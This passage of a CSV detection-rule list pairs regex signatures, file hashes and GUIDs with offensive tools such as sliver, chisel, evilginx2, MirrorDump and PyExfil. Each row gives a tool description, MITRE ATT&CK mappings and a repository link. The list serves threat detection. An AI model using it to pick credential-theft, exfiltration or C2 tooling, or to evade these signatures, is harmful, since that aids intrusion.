T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*CCob/lsarelayx*",".{0,1000}CCob\/lsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool 
designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*CCob/MirrorDump*",".{0,1000}CCob\/MirrorDump.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*CCob/SweetPotato*",".{0,1000}CCob\/SweetPotato.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*CCob/ThreadlessInject*",".{0,1000}CCob\/ThreadlessInject.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*cd DuckDuckC2*",".{0,1000}cd\s\sDuckDuckC2.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","0","N/A","10","10","69","7","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z" "*cd ./whereami/*",".{0,1000}cd\s\.\/whereami\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return 
the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","0","N/A","10","10","157","28","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" "*cd ffuf*",".{0,1000}cd\sffuf.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*cd golang_c2*",".{0,1000}cd\sgolang_c2.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*cd inceptor*",".{0,1000}cd\sinceptor.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*cd katoolin3*",".{0,1000}cd\skatoolin3.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*cd koadic*",".{0,1000}cd\skoadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*cd ligolo*",".{0,1000}cd\sligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cd PurplePanda*",".{0,1000}cd\sPurplePanda.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation 
paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*cd PyExfil*",".{0,1000}cd\sPyExfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*cd2101e2377fe9da558c198ff1d2311a9eeec08faa767a86ac51fffb50a5565d*",".{0,1000}cd2101e2377fe9da558c198ff1d2311a9eeec08faa767a86ac51fffb50a5565d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*CD257C0A-9071-42B4-A2FF-180622DBCA96*",".{0,1000}CD257C0A\-9071\-42B4\-A2FF\-180622DBCA96.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*CD3578F6-01B7-48C9-9140-1AFA44B3A7C0*",".{0,1000}CD3578F6\-01B7\-48C9\-9140\-1AFA44B3A7C0.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" 
"*cd368574698bcb3e3846833badff06b3e0d3799c2f371d029a60403f0f270f5a*",".{0,1000}cd368574698bcb3e3846833badff06b3e0d3799c2f371d029a60403f0f270f5a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cd40dbcdae84b1c8606f29342066547069ed5a33*",".{0,1000}cd40dbcdae84b1c8606f29342066547069ed5a33.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CD517B47-6CA1-4AC3-BC37-D8A27F2F03A0*",".{0,1000}CD517B47\-6CA1\-4AC3\-BC37\-D8A27F2F03A0.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd*",".{0,1000}cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - 
T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*cdaee04229c5aefdb806af27910f34d3*",".{0,1000}cdaee04229c5aefdb806af27910f34d3.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*cdb6b0d366c80ef521a59334a58f95ea5b7dbddc6e9f81ff28a11ec44ceba696*",".{0,1000}cdb6b0d366c80ef521a59334a58f95ea5b7dbddc6e9f81ff28a11ec44ceba696.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*cdb93e8cd015790f3895a76168b8ce42f73bc7da4ee4ab08c9ea7ae7fecbd9e3*",".{0,1000}cdb93e8cd015790f3895a76168b8ce42f73bc7da4ee4ab08c9ea7ae7fecbd9e3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*cdd1184f3b6ee040bb0f668cb15a4691d327009942857bd0c62b11cd0e3d0f50*",".{0,1000}cdd1184f3b6ee040bb0f668cb15a4691d327009942857bd0c62b11cd0e3d0f50.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*cddownloadelevategetprivsinjectpersistportscanpspwdrunassaveshellshutdownsleep*",".{0,1000}cddownloadelevategetprivsinjectpersistportscanpspwdrunassaveshellshutdownsleep.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*cded4541c570c91fd895adeca650b968f20fb68809e59f007a896730d097d8af*",".{0,1000}cded4541c570c91fd895adeca650b968f20fb68809e59f007a896730d097d8af.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cdimage.kali.org/*",".{0,1000}cdimage\.kali\.org\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cdn_proxy cloudflare ",".{0,1000}cdn_proxy\scloudflare\s","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","","","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*cdn_proxy_burp_ext.py*",".{0,1000}cdn_proxy_burp_ext\.py.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" 
"*cdn-proxy -*",".{0,1000}cdn\-proxy\s\-.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*cdn-proxy cloudfront *",".{0,1000}cdn\-proxy\scloudfront\s.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*cdn-proxy.git*",".{0,1000}cdn\-proxy\.git.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*cdn-proxy/burp_extension*",".{0,1000}cdn\-proxy\/burp_extension.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*Cdn-Proxy-Host*",".{0,1000}Cdn\-Proxy\-Host.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating 
from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*Cdn-Proxy-Origin*",".{0,1000}Cdn\-Proxy\-Origin.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*cdn-scanner -*",".{0,1000}cdn\-scanner\s\-.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*ce189906ea564b5bd6d924791d90b65a3c56d4313d45bdab310145e55a042b6f*",".{0,1000}ce189906ea564b5bd6d924791d90b65a3c56d4313d45bdab310145e55a042b6f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*CE2307EB-A69E-0EB9-386C-D322223A10A9*",".{0,1000}CE2307EB\-A69E\-0EB9\-386C\-D322223A10A9.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - 
TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*ce26cac7b0d52a3922cc05a777bb83025430a6a5d31104840a0099d7bd0cb2f4*",".{0,1000}ce26cac7b0d52a3922cc05a777bb83025430a6a5d31104840a0099d7bd0cb2f4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*ce2e6ef4cc10bd9de836c9de164dd80e043d713ef1ee3425b5bc29f4c7c6e39e*",".{0,1000}ce2e6ef4cc10bd9de836c9de164dd80e043d713ef1ee3425b5bc29f4c7c6e39e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ce4255704740f395be5713b049b97814ce537c440b1249850bcb62794dcc7f56*",".{0,1000}ce4255704740f395be5713b049b97814ce537c440b1249850bcb62794dcc7f56.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" 
"*ce4821d0b380319df17ce6166db15577abd9e77d090d15c83fa67545174f4631*",".{0,1000}ce4821d0b380319df17ce6166db15577abd9e77d090d15c83fa67545174f4631.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ce514ccbb11797a5e0457b8da2cf4914b753928dcc15d59d4db2d2b5ffcd061b*",".{0,1000}ce514ccbb11797a5e0457b8da2cf4914b753928dcc15d59d4db2d2b5ffcd061b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*CE61ADEE-C032-43EC-ACD8-E4A742F894A3*",".{0,1000}CE61ADEE\-C032\-43EC\-ACD8\-E4A742F894A3.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ce70b1200ce76360dec6129189daa260779901d01f150868c9f19ec6cea77b36*",".{0,1000}ce70b1200ce76360dec6129189daa260779901d01f150868c9f19ec6cea77b36.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*ce75590d1d79bc808d98b70ec03355d1117ca54c3b49b6ba474aa704ea9a6c2e*",".{0,1000}ce75590d1d79bc808d98b70ec03355d1117ca54c3b49b6ba474aa704ea9a6c2e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*CE895D82-85AA-41D9-935A-9625312D87D0*",".{0,1000}CE895D82\-85AA\-41D9\-935A\-9625312D87D0.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*ce9ae24722afd760de25a8961c4446b64235936b8ac8d1c2c25625d4feaee6e6*",".{0,1000}ce9ae24722afd760de25a8961c4446b64235936b8ac8d1c2c25625d4feaee6e6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive 
tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cea27c53085b6cf1d9505957144aa23b794550da5746e6a38a212a03b505e157*",".{0,1000}cea27c53085b6cf1d9505957144aa23b794550da5746e6a38a212a03b505e157.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*cee1f314c34ecccd4fcb94d0715126130d02aeb153ec8504fbbae67c244cdb45*",".{0,1000}cee1f314c34ecccd4fcb94d0715126130d02aeb153ec8504fbbae67c244cdb45.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*cef1fb3c6273b3a908f79a5a5d74dbfe4ceabd2d9f850b2bd3e08e1908c440f1*",".{0,1000}cef1fb3c6273b3a908f79a5a5d74dbfe4ceabd2d9f850b2bd3e08e1908c440f1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cefcadb734f22d7ddd0ce551628c246f4484400758ccb64afeb37bb93c78b5e0*",".{0,1000}cefcadb734f22d7ddd0ce551628c246f4484400758ccb64afeb37bb93c78b5e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure 